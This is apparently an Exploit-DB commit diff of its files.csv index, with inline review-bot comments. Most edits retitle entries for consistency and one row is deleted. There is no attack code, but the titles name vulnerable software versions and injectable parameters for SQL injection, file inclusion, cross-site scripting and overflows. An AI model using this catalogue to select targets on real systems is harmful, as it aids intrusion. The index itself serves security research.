DB: 2016-11-12

1 new exploits

PunBB 2.0.10 - (Register Multiple Users) Denial of Service
PunBB 2.0.10 - (Register Multiple Users) Denial Of Service

QuickTime 7.4.1 - QTPlugin.ocx Multiple Stack Overflow Vulnerabilities
QuickTime 7.4.1 - 'QTPlugin.ocx' Multiple Stack Overflow Vulnerabilities

Apple iTunes 8.0.2.20/QuickTime 7.5.5 - (.mov) Multiple Off By Overflow (PoC)
Apple iTunes 8.0.2.20/QuickTime 7.5.5 - '.mov' Multiple Off By Overflow (PoC)

Apple QuickTime - MOV File Parsing Memory Corruption
Apple QuickTime - '.mov' Parsing Memory Corruption

Apple QuickTime - (rtsp URL Handler) Stack Buffer Overflow
Apple QuickTime - 'rtsp URL Handler' Stack Buffer Overflow
Apple QuickTime (Windows 2000) - (rtsp URL Handler) Buffer Overflow
Apple QuickTime 7.1.3 - (HREFTrack) Cross-Zone Scripting Exploit
Apple QuickTime (Windows 2000) - 'rtsp URL Handler' Buffer Overflow
Apple QuickTime 7.1.3 - 'HREFTrack' Cross-Zone Scripting

Citrix Presentation Server Client - WFICA.OCX ActiveX Heap Buffer Overflow
Citrix Presentation Server Client - 'WFICA.OCX' ActiveX Heap Buffer Overflow

Philips VOIP841 - (Firmware 1.0.4.800) Multiple Vulnerabilities
Philips VOIP841 'Firmware 1.0.4.800' - Multiple Vulnerabilities

Ourgame GLWorld 2.x - hgs_startNotify() ActiveX Buffer Overflow
Ourgame GLWorld 2.x - 'hgs_startNotify()' ActiveX Buffer Overflow

Citrix Presentation Server Client 9.200 - WFICA.OCX ActiveX Component Heap Buffer Overflow

PunBB 1.2.4 - (change_email) SQL Injection
PunBB 1.2.4 - 'id' Parameter SQL Injection

PHP Live Helper 1.x - 'abs_path' Remote File Inclusion
PHP Live Helper 1.x - 'abs_path' Parameter Remote File Inclusion

PHP Live! 3.2.1 - (help.php) Remote File Inclusion
PHP Live! 3.2.1 - 'help.php' Remote File Inclusion

PHP Live Helper 2.0 - 'abs_path' Remote File Inclusion
PHP Live Helper 2.0 - 'abs_path' Parameter Remote File Inclusion

nuBoard 0.5 - (index.php site) Remote File Inclusion
nuBoard 0.5 - 'site' Parameter Remote File Inclusion

vKios 2.0.0 - (products.php cat) SQL Injection
vKios 2.0.0 - 'cat' Parameter SQL Injection

Joomla! Component xfaq 1.2 - (aid) SQL Injection
Joomla! Component xfaq 1.2 - 'aid' Parameter SQL Injection

nuBoard 0.5 - (threads.php ssid) SQL Injection
nuBoard 0.5 - 'ssid' Parameter SQL Injection
Joomla! Component paxxgallery 0.2 - (iid) SQL Injection
Joomla! Component MCQuiz 0.9 Final - (tid) SQL Injection
Joomla! Component Quiz 0.81 - (tid) SQL Injection
Joomla! Component mediaslide (albumnum) - Blind SQL Injection
LookStrike Lan Manager 0.9 - Remote File Inclusion / Local File Inclusion
Joomla! Component paxxgallery 0.2 - 'iid' Parameter SQL Injection
Joomla! Component MCQuiz 0.9 Final - 'tid' Parameter SQL Injection
Joomla! Component Quiz 0.81 - 'tid' Parameter SQL Injection
Joomla! Component mediaslide - 'albumnum' Blind SQL Injection
LookStrike Lan Manager 0.9 - Remote / Local File Inclusion

PHP Live! 3.2.2 - (questid) SQL Injection (1)
PHP Live! 3.2.2 - 'questid' Parameter SQL Injection (1)

Mambo Component Quran 1.1 - (surano) SQL Injection
Mambo Component Quran 1.1 - 'surano' Parameter SQL Injection

Simple CMS 1.0.3 - (indexen.php area) SQL Injection
Simple CMS 1.0.3 - 'area' Parameter SQL Injection

XPWeb 3.3.2 - (download.php url) Remote File Disclosure
XPWeb 3.3.2 - 'url' Parameter Remote File Disclosure
Joomla! Component com_pccookbook - (user_id) SQL Injection
Joomla! Component com_clasifier - 'cat_id' SQL Injection
PHP-Nuke Module books SQL - 'cid' SQL Injection
XOOPS Module myTopics - 'articleId' SQL Injection
Joomla! Component com_pccookbook - 'user_id' Parameter SQL Injection
Joomla! Component com_clasifier - 'cat_id' Parameter SQL Injection
PHP-Nuke Module books SQL - 'cid' Parameter SQL Injection
XOOPS Module myTopics - 'articleId' Parameter SQL Injection
PHP-Nuke Module Sections - (artid) SQL Injection
PHP-Nuke Module EasyContent - (page_id) SQL Injection
RunCMS Module MyAnnonces - 'cid' SQL Injection
XOOPS Module eEmpregos - 'cid' SQL Injection
XOOPS Module Classifieds - 'cid' SQL Injection
PHP-Nuke Modules Okul 1.0 - (okulid) SQL Injection
Joomla! Component com_hwdvideoshare - SQL Injection
PHP-Nuke Module Docum - (artid) SQL Injection
Globsy 1.0 - (file) Remote File Disclosure
PHP-Nuke Module Inhalt - 'cid' SQL Injection
PHP-Nuke Module Sections - 'artid' Parameter SQL Injection
PHP-Nuke Module EasyContent - 'page_id' Parameter SQL Injection
RunCMS Module MyAnnonces - 'cid' Parameter SQL Injection
XOOPS Module eEmpregos - 'cid' Parameter SQL Injection
XOOPS Module Classifieds - 'cid' Parameter SQL Injection
PHP-Nuke Modules Okul 1.0 - 'okulid' Parameter SQL Injection
Joomla! Component Highwood Design hwdVideoShare - SQL Injection
PHP-Nuke Module Docum - 'artid' Parameter SQL Injection
Globsy 1.0 - 'file' Parameter Remote File Disclosure
PHP-Nuke Module Inhalt - 'cid' Parameter SQL Injection

Joomla! Component paxxgallery 0.2 - (gid) Blind SQL Injection
Joomla! Component paxxgallery 0.2 - 'gid' Parameter Blind SQL Injection

Pre Simple CMS - (Authentication Bypass) SQL Injection
Pre Simple CMS - SQL Injection (Authentication Bypass)

Joomla! Component com_pccookbook - (recipe_id) Blind SQL Injection
Joomla! Component com_pccookbook - 'recipe_id' Parameter Blind SQL Injection

PHP Live! 3.2.1/2 - '&x=' Blind SQL Injection
PHP Live! 3.2.1/2 - 'x' Parameter Blind SQL Injection

PHP Live! 3.2.2 - (questid) SQL Injection (2)
PHP Live! 3.2.2 - 'questid' Parameter SQL Injection (2)

PunBB Automatic Image Upload 1.3.5 - Delete Arbitrary File Exploit
PunBB Automatic Image Upload 1.3.5 - Arbitrary File Delete

Really Simple CMS 0.3a - (pagecontent.php PT) Local File Inclusion
Really Simple CMS 0.3a - 'PT' Parameter Local File Inclusion

Simple CMS Framework 1.0 - (page) SQL Injection
Simple CMS Framework 1.0 - 'page' Parameter SQL Injection

PHP Live! 3.3 - (deptid) SQL Injection
PHP Live! 3.3 - 'deptid' Parameter SQL Injection

Getsimple CMS 2.01 - (Cross-Site Scripting / Cross-Site Request Forgery) Multiple Vulnerabilities
Getsimple CMS 2.01 - Multiple Vulnerabilities

GNUBoard 4.33.02 - tp.php PATH_INFO SQL Injection
GNUBoard 4.33.02 - 'tp.php' PATH_INFO SQL Injection

auraCMS 1.5 - Multiple Cross-Site Scripting Vulnerabilities

PunBB 1.x - profile.php User Profile Edit Module SQL Injection
PunBB 1.x - 'profile.php' User Profile Edit Module SQL Injection

PunBB 1.2.x - search.php SQL Injection
PunBB 1.2.x - 'search.php' SQL Injection

PHP Live! 3.0 - Status_Image.php Cross-Site Scripting

PHP Live Helper 2.0 - chat.php Cross-Site Scripting
PHP Live! 3.2.2 - setup/transcripts.php search_string Parameter Cross-Site Scripting
PHP Live! 3.2.2 - 'index.php' l Parameter Cross-Site Scripting
PHP Live! 3.2.2 - PHPlive/message_box.php Multiple Parameter Cross-Site Scripting
artmedic weblog - artmedic_print.php date Parameter Cross-Site Scripting
artmedic weblog - 'index.php' jahrneu Parameter Cross-Site Scripting

PunBB 1.2.x - 'p' Parameter Multiple Cross-Site Scripting Vulnerabilities

PunBB 1.3 - 'viewtopic.php' Cross-Site Scripting
InvoicePlane 1.4.8 - Password Reset

Getsimple CMS 2.01 - admin/template/error_checking.php Multiple Parameter Cross-Site Scripting

Getsimple CMS 2.01 - 'admin/changedata.php' Cross-Site Scripting
Getsimple CMS 2.01 - 'changedata.php' Cross-Site Scripting

Getsimple CMS 2.03 - 'admin/upload-ajax.php' Arbitrary File Upload
Getsimple CMS 2.03 - 'upload-ajax.php' Arbitrary File Upload

PunBB 1.3.6 - 'browse.php' Cross-Site Scripting
Getsimple CMS 3.1 - admin/theme.php err Parameter Reflected Cross-Site Scripting
Getsimple CMS 3.1 - admin/pages.php error Parameter Reflected Cross-Site Scripting
Getsimple CMS 3.1 - admin/index.php Multiple Parameter Reflected Cross-Site Scripting
Getsimple CMS 3.1 - admin/upload.php path Parameter Cross-Site Scripting
Getsimple CMS - /admin/edit.php Multiple Parameter Cross-Site Scripting
Getsimple CMS - /admin/filebrowser.php Multiple Parameter Cross-Site Scripting
Offensive Security 2016-11-12 05:01:20 +00:00
parent b502c0ccb5
commit 8a72733f20
21 changed files with 84 additions and 258 deletions

132
files.csv

@ -284,7 +284,7 @@ id,file,description,date,author,platform,type,port
1489,platforms/multiple/dos/1489.pl,"Invision Power Board 2.1.4 - (Register Users) Denial of Service",2006-02-10,SkOd,multiple,dos,0 1489,platforms/multiple/dos/1489.pl,"Invision Power Board 2.1.4 - (Register Users) Denial of Service",2006-02-10,SkOd,multiple,dos,0
1496,platforms/hardware/dos/1496.c,"D-Link (Wireless Access Point) - (Fragmented UDP) Denial of Service",2006-02-14,"Aaron Portnoy",hardware,dos,0 1496,platforms/hardware/dos/1496.c,"D-Link (Wireless Access Point) - (Fragmented UDP) Denial of Service",2006-02-14,"Aaron Portnoy",hardware,dos,0
1500,platforms/windows/dos/1500.cpp,"Microsoft Windows Media Player 7.1 <= 10 - BMP Heap Overflow PoC (MS06-005) (1)",2006-02-15,ATmaCA,windows,dos,0 1500,platforms/windows/dos/1500.cpp,"Microsoft Windows Media Player 7.1 <= 10 - BMP Heap Overflow PoC (MS06-005) (1)",2006-02-15,ATmaCA,windows,dos,0
1517,platforms/php/dos/1517.c,"PunBB 2.0.10 - (Register Multiple Users) Denial of Service",2006-02-20,K4P0,php,dos,0 1517,platforms/php/dos/1517.c,"PunBB 2.0.10 - (Register Multiple Users) Denial Of Service",2006-02-20,K4P0,php,dos,0
1531,platforms/windows/dos/1531.pl,"ArGoSoft FTP Server 1.4.3.5 - Remote Buffer Overflow (PoC)",2006-02-25,"Jerome Athias",windows,dos,0 1531,platforms/windows/dos/1531.pl,"ArGoSoft FTP Server 1.4.3.5 - Remote Buffer Overflow (PoC)",2006-02-25,"Jerome Athias",windows,dos,0
1535,platforms/windows/dos/1535.c,"CrossFire 1.8.0 - (oldsocketmode) Remote Buffer Overflow (PoC)",2006-02-27,"Luigi Auriemma",windows,dos,0 1535,platforms/windows/dos/1535.c,"CrossFire 1.8.0 - (oldsocketmode) Remote Buffer Overflow (PoC)",2006-02-27,"Luigi Auriemma",windows,dos,0
1540,platforms/bsd/dos/1540.pl,"FreeBSD 6.0 - (nfsd) Remote Kernel Panic Denial of Service",2006-02-28,"Evgeny Legerov",bsd,dos,0 1540,platforms/bsd/dos/1540.pl,"FreeBSD 6.0 - (nfsd) Remote Kernel Panic Denial of Service",2006-02-28,"Evgeny Legerov",bsd,dos,0
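Review bot: The new title for 1517 capitalises "Of" ("Denial Of Service"), while the unchanged rows around it (1489, 1496, 1540) all use "Denial of Service". The entry will now be missed by a case-sensitive search for the usual phrase. Keep the lowercase "of" so the row matches its neighbours.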
@ -692,7 +692,7 @@ id,file,description,date,author,platform,type,port
5067,platforms/windows/dos/5067.pl,"dBpowerAMP Audio Player Release 2 - '.m3u' Buffer Overflow (PoC)",2008-02-05,securfrog,windows,dos,0 5067,platforms/windows/dos/5067.pl,"dBpowerAMP Audio Player Release 2 - '.m3u' Buffer Overflow (PoC)",2008-02-05,securfrog,windows,dos,0
5085,platforms/windows/dos/5085.txt,"jetAudio 7.0.5 - '.asx' Remote Stack Overflow (PoC)",2008-02-08,"laurent gaffié",windows,dos,0 5085,platforms/windows/dos/5085.txt,"jetAudio 7.0.5 - '.asx' Remote Stack Overflow (PoC)",2008-02-08,"laurent gaffié",windows,dos,0
5086,platforms/windows/dos/5086.html,"ImageStation - 'SonyISUpload.cab 1.0.0.38' ActiveX Buffer Overflow (PoC)",2008-02-08,Trancek,windows,dos,0 5086,platforms/windows/dos/5086.html,"ImageStation - 'SonyISUpload.cab 1.0.0.38' ActiveX Buffer Overflow (PoC)",2008-02-08,Trancek,windows,dos,0
5110,platforms/windows/dos/5110.txt,"QuickTime 7.4.1 - QTPlugin.ocx Multiple Stack Overflow Vulnerabilities",2008-02-13,"laurent gaffié",windows,dos,0 5110,platforms/windows/dos/5110.txt,"QuickTime 7.4.1 - 'QTPlugin.ocx' Multiple Stack Overflow Vulnerabilities",2008-02-13,"laurent gaffié",windows,dos,0
5122,platforms/windows/dos/5122.pl,"Rosoft Media Player 4.1.8 - '.m3u' File Remote Buffer Overflow (PoC)",2008-02-14,securfrog,windows,dos,0 5122,platforms/windows/dos/5122.pl,"Rosoft Media Player 4.1.8 - '.m3u' File Remote Buffer Overflow (PoC)",2008-02-14,securfrog,windows,dos,0
5142,platforms/windows/dos/5142.c,"DESlock+ <= 3.2.6 - 'DLMFENC.sys' Local Kernel Ring0 link list zero (PoC)",2008-02-18,mu-b,windows,dos,0 5142,platforms/windows/dos/5142.c,"DESlock+ <= 3.2.6 - 'DLMFENC.sys' Local Kernel Ring0 link list zero (PoC)",2008-02-18,mu-b,windows,dos,0
5151,platforms/ios/dos/5151.pl,"Apple iOS 4.0.3 - DPAP Server Denial of Service",2008-02-18,"David Wharton",ios,dos,0 5151,platforms/ios/dos/5151.pl,"Apple iOS 4.0.3 - DPAP Server Denial of Service",2008-02-18,"David Wharton",ios,dos,0
@ -863,7 +863,7 @@ id,file,description,date,author,platform,type,port
7226,platforms/windows/dos/7226.html,"Google Chrome - MetaCharacter URI Obfuscation",2008-11-25,"Aditya K Sood",windows,dos,0 7226,platforms/windows/dos/7226.html,"Google Chrome - MetaCharacter URI Obfuscation",2008-11-25,"Aditya K Sood",windows,dos,0
7249,platforms/windows/dos/7249.php,"i.Scribe SMTP Client 2.00b - (wscanf) Remote Format String (PoC)",2008-11-27,"Alfons Luja",windows,dos,0 7249,platforms/windows/dos/7249.php,"i.Scribe SMTP Client 2.00b - (wscanf) Remote Format String (PoC)",2008-11-27,"Alfons Luja",windows,dos,0
7262,platforms/windows/dos/7262.pl,"Microsoft Office - Communicator (SIP) Remote Denial of Service",2008-11-28,"Praveen Darshanam",windows,dos,0 7262,platforms/windows/dos/7262.pl,"Microsoft Office - Communicator (SIP) Remote Denial of Service",2008-11-28,"Praveen Darshanam",windows,dos,0
7296,platforms/windows/dos/7296.txt,"Apple iTunes 8.0.2.20/QuickTime 7.5.5 - (.mov) Multiple Off By Overflow (PoC)",2008-11-30,"laurent gaffié",windows,dos,0 7296,platforms/windows/dos/7296.txt,"Apple iTunes 8.0.2.20/QuickTime 7.5.5 - '.mov' Multiple Off By Overflow (PoC)",2008-11-30,"laurent gaffié",windows,dos,0
7297,platforms/windows/dos/7297.py,"Cain & Abel 4.9.23 - '.rdp' Buffer Overflow (PoC)",2008-11-30,Encrypt3d.M!nd,windows,dos,0 7297,platforms/windows/dos/7297.py,"Cain & Abel 4.9.23 - '.rdp' Buffer Overflow (PoC)",2008-11-30,Encrypt3d.M!nd,windows,dos,0
7307,platforms/windows/dos/7307.txt,"Electronics Workbench - '.ewb' Local Stack Overflow (PoC)",2008-11-30,Zigma,windows,dos,0 7307,platforms/windows/dos/7307.txt,"Electronics Workbench - '.ewb' Local Stack Overflow (PoC)",2008-11-30,Zigma,windows,dos,0
7314,platforms/windows/dos/7314.txt,"Maxum Rumpus 6.0 - Multiple Remote Buffer Overflow Vulnerabilities",2008-12-01,"BLUE MOON",windows,dos,0 7314,platforms/windows/dos/7314.txt,"Maxum Rumpus 6.0 - Multiple Remote Buffer Overflow Vulnerabilities",2008-12-01,"BLUE MOON",windows,dos,0
@ -3718,7 +3718,7 @@ id,file,description,date,author,platform,type,port
29535,platforms/osx/dos/29535.txt,"Telestream Flip4Mac - 'WMV' File Remote Memory Corruption",2007-01-27,kf,osx,dos,0 29535,platforms/osx/dos/29535.txt,"Telestream Flip4Mac - 'WMV' File Remote Memory Corruption",2007-01-27,kf,osx,dos,0
29536,platforms/windows/dos/29536.html,"Microsoft Internet Explorer 5.0.1 - Multiple ActiveX Controls Denial of Service Vulnerabilities",2007-01-29,"Alexander Sotirov",windows,dos,0 29536,platforms/windows/dos/29536.html,"Microsoft Internet Explorer 5.0.1 - Multiple ActiveX Controls Denial of Service Vulnerabilities",2007-01-29,"Alexander Sotirov",windows,dos,0
29540,platforms/solaris/dos/29540.c,"Sun Solaris 10 - ICMP Unspecified Remote Denial of Service",2007-01-30,kcope,solaris,dos,0 29540,platforms/solaris/dos/29540.c,"Sun Solaris 10 - ICMP Unspecified Remote Denial of Service",2007-01-30,kcope,solaris,dos,0
39839,platforms/osx/dos/39839.txt,"Apple QuickTime - MOV File Parsing Memory Corruption",2016-05-19,"Francis Provencher",osx,dos,0 39839,platforms/osx/dos/39839.txt,"Apple QuickTime - '.mov' Parsing Memory Corruption",2016-05-19,"Francis Provencher",osx,dos,0
29683,platforms/linux/dos/29683.txt,"Linux Kernel 2.6.x - Audit Subsystems Local Denial of Service",2007-02-27,"Steve Grubb",linux,dos,0 29683,platforms/linux/dos/29683.txt,"Linux Kernel 2.6.x - Audit Subsystems Local Denial of Service",2007-02-27,"Steve Grubb",linux,dos,0
29545,platforms/windows/dos/29545.rb,"Hanso Converter 2.4.0 - 'ogg' Buffer Overflow (Denial of Service)",2013-11-12,"Necmettin COSKUN",windows,dos,0 29545,platforms/windows/dos/29545.rb,"Hanso Converter 2.4.0 - 'ogg' Buffer Overflow (Denial of Service)",2013-11-12,"Necmettin COSKUN",windows,dos,0
29546,platforms/windows/dos/29546.rb,"Provj 5.1.5.8 - 'm3u' Buffer Overflow (PoC)",2013-11-12,"Necmettin COSKUN",windows,dos,0 29546,platforms/windows/dos/29546.rb,"Provj 5.1.5.8 - 'm3u' Buffer Overflow (PoC)",2013-11-12,"Necmettin COSKUN",windows,dos,0
@ -9197,10 +9197,10 @@ id,file,description,date,author,platform,type,port
3055,platforms/windows/remote/3055.html,"WinZip 10.0 - FileView ActiveX Controls Remote Overflow",2006-12-31,XiaoHui,windows,remote,0 3055,platforms/windows/remote/3055.html,"WinZip 10.0 - FileView ActiveX Controls Remote Overflow",2006-12-31,XiaoHui,windows,remote,0
3058,platforms/windows/remote/3058.html,"Rediff Bol Downloader - (ActiveX Control) Execute Local File Exploit",2006-12-31,"Gregory R. Panakkal",windows,remote,0 3058,platforms/windows/remote/3058.html,"Rediff Bol Downloader - (ActiveX Control) Execute Local File Exploit",2006-12-31,"Gregory R. Panakkal",windows,remote,0
3063,platforms/windows/remote/3063.pl,"Formbankserver 1.9 - (Name) Directory Traversal",2007-01-01,Bl0od3r,windows,remote,0 3063,platforms/windows/remote/3063.pl,"Formbankserver 1.9 - (Name) Directory Traversal",2007-01-01,Bl0od3r,windows,remote,0
3064,platforms/multiple/remote/3064.rb,"Apple QuickTime - (rtsp URL Handler) Stack Buffer Overflow",2007-01-01,MoAB,multiple,remote,0 3064,platforms/multiple/remote/3064.rb,"Apple QuickTime - 'rtsp URL Handler' Stack Buffer Overflow",2007-01-01,MoAB,multiple,remote,0
3067,platforms/windows/remote/3067.txt,"QK SMTP 3.01 - (RCPT TO) Remote Buffer Overflow (2)",2007-01-01,"Jacopo Cervini",windows,remote,25 3067,platforms/windows/remote/3067.txt,"QK SMTP 3.01 - (RCPT TO) Remote Buffer Overflow (2)",2007-01-01,"Jacopo Cervini",windows,remote,25
3072,platforms/windows/remote/3072.py,"Apple QuickTime (Windows 2000) - (rtsp URL Handler) Buffer Overflow",2007-01-03,"Winny Thomas",windows,remote,0 3072,platforms/windows/remote/3072.py,"Apple QuickTime (Windows 2000) - 'rtsp URL Handler' Buffer Overflow",2007-01-03,"Winny Thomas",windows,remote,0
3077,platforms/osx/remote/3077.rb,"Apple QuickTime 7.1.3 - (HREFTrack) Cross-Zone Scripting Exploit",2007-01-03,MoAB,osx,remote,0 3077,platforms/osx/remote/3077.rb,"Apple QuickTime 7.1.3 - 'HREFTrack' Cross-Zone Scripting",2007-01-03,MoAB,osx,remote,0
3084,platforms/windows/remote/3084.txt,"Adobe Acrobat Reader Plugin 7.0.x - (acroreader) Cross-Site Scripting",2007-01-05,"Stefano Di Paola",windows,remote,0 3084,platforms/windows/remote/3084.txt,"Adobe Acrobat Reader Plugin 7.0.x - (acroreader) Cross-Site Scripting",2007-01-05,"Stefano Di Paola",windows,remote,0
3086,platforms/windows/remote/3086.py,"CA BrightStor ARCserve - 'tapeeng.exe' Remote Buffer Overflow",2007-01-05,"Winny Thomas",windows,remote,6502 3086,platforms/windows/remote/3086.py,"CA BrightStor ARCserve - 'tapeeng.exe' Remote Buffer Overflow",2007-01-05,"Winny Thomas",windows,remote,6502
3092,platforms/windows/remote/3092.pm,"NaviCOPA Web Server 2.01 - (GET) Remote Buffer Overflow (Metasploit)",2007-01-07,"Jacopo Cervini",windows,remote,80 3092,platforms/windows/remote/3092.pm,"NaviCOPA Web Server 2.01 - (GET) Remote Buffer Overflow (Metasploit)",2007-01-07,"Jacopo Cervini",windows,remote,80
@ -9537,11 +9537,11 @@ id,file,description,date,author,platform,type,port
5087,platforms/windows/remote/5087.html,"Microsoft DirectSpeechSynthesis Module - Remote Buffer Overflow",2008-02-09,rgod,windows,remote,0 5087,platforms/windows/remote/5087.html,"Microsoft DirectSpeechSynthesis Module - Remote Buffer Overflow",2008-02-09,rgod,windows,remote,0
5100,platforms/windows/remote/5100.html,"ImageStation - 'SonyISUpload.cab 1.0.0.38' ActiveX Buffer Overflow",2008-02-10,Elazar,windows,remote,0 5100,platforms/windows/remote/5100.html,"ImageStation - 'SonyISUpload.cab 1.0.0.38' ActiveX Buffer Overflow",2008-02-10,Elazar,windows,remote,0
5102,platforms/windows/remote/5102.html,"FaceBook PhotoUploader 5.0.14.0 - Remote Buffer Overflow",2008-02-12,"MC Group Ltd.",windows,remote,0 5102,platforms/windows/remote/5102.html,"FaceBook PhotoUploader 5.0.14.0 - Remote Buffer Overflow",2008-02-12,"MC Group Ltd.",windows,remote,0
5106,platforms/windows/remote/5106.html,"Citrix Presentation Server Client - WFICA.OCX ActiveX Heap Buffer Overflow",2008-02-12,Elazar,windows,remote,0 5106,platforms/windows/remote/5106.html,"Citrix Presentation Server Client - 'WFICA.OCX' ActiveX Heap Buffer Overflow",2008-02-12,Elazar,windows,remote,0
5111,platforms/windows/remote/5111.html,"IBM Domino Web Access Upload Module - Overwrite (SEH)",2008-02-13,Elazar,windows,remote,0 5111,platforms/windows/remote/5111.html,"IBM Domino Web Access Upload Module - Overwrite (SEH)",2008-02-13,Elazar,windows,remote,0
5113,platforms/hardware/remote/5113.txt,"Philips VOIP841 - (Firmware 1.0.4.800) Multiple Vulnerabilities",2008-02-14,ikki,hardware,remote,0 5113,platforms/hardware/remote/5113.txt,"Philips VOIP841 'Firmware 1.0.4.800' - Multiple Vulnerabilities",2008-02-14,ikki,hardware,remote,0
5150,platforms/hardware/remote/5150.txt,"Thecus N5200Pro NAS Server Control Panel - Remote File Inclusion",2008-02-18,Crackers_Child,hardware,remote,0 5150,platforms/hardware/remote/5150.txt,"Thecus N5200Pro NAS Server Control Panel - Remote File Inclusion",2008-02-18,Crackers_Child,hardware,remote,0
5153,platforms/windows/remote/5153.asp,"Ourgame GLWorld 2.x - hgs_startNotify() ActiveX Buffer Overflow",2008-02-19,luoluo,windows,remote,0 5153,platforms/windows/remote/5153.asp,"Ourgame GLWorld 2.x - 'hgs_startNotify()' ActiveX Buffer Overflow",2008-02-19,luoluo,windows,remote,0
5188,platforms/windows/remote/5188.html,"Rising AntiVirus Online Scanner - Insecure Method Flaw Exploit",2008-02-25,"John Smith",windows,remote,0 5188,platforms/windows/remote/5188.html,"Rising AntiVirus Online Scanner - Insecure Method Flaw Exploit",2008-02-25,"John Smith",windows,remote,0
5190,platforms/windows/remote/5190.html,"Move Networks Quantum Streaming Player Control - Buffer Overflow",2008-02-26,Elazar,windows,remote,0 5190,platforms/windows/remote/5190.html,"Move Networks Quantum Streaming Player Control - Buffer Overflow",2008-02-26,Elazar,windows,remote,0
5193,platforms/windows/remote/5193.html,"D-Link MPEG4 SHM Audio Control - 'VAPGDecoder.dll 1.7.0.5' Buffer Overflow",2008-02-26,rgod,windows,remote,0 5193,platforms/windows/remote/5193.html,"D-Link MPEG4 SHM Audio Control - 'VAPGDecoder.dll 1.7.0.5' Buffer Overflow",2008-02-26,rgod,windows,remote,0
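Review bot: In the 5113 row the firmware version is moved in front of the dash and wrapped in quotes ("Philips VOIP841 'Firmware 1.0.4.800' - Multiple Vulnerabilities"), but the other quotes introduced in this hunk mark a file or function name ('WFICA.OCX', 'hgs_startNotify()'), and versions in neighbouring rows are unquoted (for example "FaceBook PhotoUploader 5.0.14.0"). Suggest "Philips VOIP841 Firmware 1.0.4.800 - Multiple Vulnerabilities" so quotes keep a single meaning across the file.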
@ -13521,7 +13521,6 @@ id,file,description,date,author,platform,type,port
29167,platforms/windows/remote/29167.rb,"Netgear WG311v1 Wireless Driver 2.3.1.10 - SSID Heap Buffer Overflow",2006-11-22,"Laurent Butti",windows,remote,0 29167,platforms/windows/remote/29167.rb,"Netgear WG311v1 Wireless Driver 2.3.1.10 - SSID Heap Buffer Overflow",2006-11-22,"Laurent Butti",windows,remote,0
29171,platforms/windows/remote/29171.txt,"Business Objects Crystal Reports XI Professional - File Handling Buffer Overflow",2006-11-23,LSsec.com,windows,remote,0 29171,platforms/windows/remote/29171.txt,"Business Objects Crystal Reports XI Professional - File Handling Buffer Overflow",2006-11-23,LSsec.com,windows,remote,0
29210,platforms/php/remote/29210.rb,"Open Flash Chart 2 - Arbitrary File Upload (Metasploit)",2013-10-26,Metasploit,php,remote,80 29210,platforms/php/remote/29210.rb,"Open Flash Chart 2 - Arbitrary File Upload (Metasploit)",2013-10-26,Metasploit,php,remote,80
29230,platforms/windows/remote/29230.html,"Citrix Presentation Server Client 9.200 - WFICA.OCX ActiveX Component Heap Buffer Overflow",2006-12-06,"Andrew Christensen",windows,remote,0
29273,platforms/hardware/remote/29273.pl,"Watchguard Firewall XTM 11.7.4u1 - Remote Buffer Overflow",2013-10-29,st3n,hardware,remote,8080 29273,platforms/hardware/remote/29273.pl,"Watchguard Firewall XTM 11.7.4u1 - Remote Buffer Overflow",2013-10-29,st3n,hardware,remote,8080
29281,platforms/windows/remote/29281.txt,"Hilgraeve HyperAccess 8.4 - Multiple Remote Command Execution Vulnerabilities",2006-12-14,"Brett Moore",windows,remote,0 29281,platforms/windows/remote/29281.txt,"Hilgraeve HyperAccess 8.4 - Multiple Remote Command Execution Vulnerabilities",2006-12-14,"Brett Moore",windows,remote,0
29290,platforms/php/remote/29290.c,"Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution",2013-10-29,kingcope,php,remote,80 29290,platforms/php/remote/29290.c,"Apache + PHP < 5.3.12 / < 5.4.2 - cgi-bin Remote Code Execution",2013-10-29,kingcope,php,remote,80
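Review bot: The row for 29230 (platforms/windows/remote/29230.html) is deleted outright, and the commit message lists only its title with no reason given. If it is being dropped as a duplicate of 5106, note that the two rows differ in author, date and stated version, so the message should say why they are treated as the same entry. Also confirm that 29230.html is removed in this same commit so that files.csv and the tree stay in sync.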
@ -15747,7 +15746,7 @@ id,file,description,date,author,platform,type,port
30090,platforms/php/webapps/30090.txt,"phpPgAdmin 4.1.1 - Redirect.php Cross-Site Scripting",2007-05-25,"Michal Majchrowicz",php,webapps,0 30090,platforms/php/webapps/30090.txt,"phpPgAdmin 4.1.1 - Redirect.php Cross-Site Scripting",2007-05-25,"Michal Majchrowicz",php,webapps,0
923,platforms/cgi/webapps/923.pl,"The Includer CGI 1.0 - Remote Command Execution (3)",2005-04-08,K-C0d3r,cgi,webapps,0 923,platforms/cgi/webapps/923.pl,"The Includer CGI 1.0 - Remote Command Execution (3)",2005-04-08,K-C0d3r,cgi,webapps,0
925,platforms/asp/webapps/925.txt,"ACNews 1.0 - Admin Authentication Bypass (SQL Injection)",2005-04-09,LaMeR,asp,webapps,0 925,platforms/asp/webapps/925.txt,"ACNews 1.0 - Admin Authentication Bypass (SQL Injection)",2005-04-09,LaMeR,asp,webapps,0
928,platforms/php/webapps/928.py,"PunBB 1.2.4 - (change_email) SQL Injection",2005-04-11,"Stefan Esser",php,webapps,0 928,platforms/php/webapps/928.py,"PunBB 1.2.4 - 'id' Parameter SQL Injection",2005-04-11,"Stefan Esser",php,webapps,0
939,platforms/php/webapps/939.pl,"S9Y Serendipity 0.8beta4 - exit.php SQL Injection",2005-04-13,kre0n,php,webapps,0 939,platforms/php/webapps/939.pl,"S9Y Serendipity 0.8beta4 - exit.php SQL Injection",2005-04-13,kre0n,php,webapps,0
954,platforms/cgi/webapps/954.pl,"E-Cart 1.1 - (index.cgi) Remote Command Execution",2005-04-25,z,cgi,webapps,0 954,platforms/cgi/webapps/954.pl,"E-Cart 1.1 - (index.cgi) Remote Command Execution",2005-04-25,z,cgi,webapps,0
980,platforms/cgi/webapps/980.pl,"I-Mall Commerce - 'i-mall.cgi' Remote Command Execution",2005-05-04,"Jerome Athias",cgi,webapps,0 980,platforms/cgi/webapps/980.pl,"I-Mall Commerce - 'i-mall.cgi' Remote Command Execution",2005-05-04,"Jerome Athias",cgi,webapps,0
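Review bot: The retitled 928 row drops "change_email", which was the only hint in the title of where the injection sits. "'id' Parameter" on its own is generic enough that this entry becomes hard to tell apart from other PunBB SQL injection rows. Consider keeping the change_email context in the title alongside the parameter name.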
@ -16172,7 +16171,7 @@ id,file,description,date,author,platform,type,port
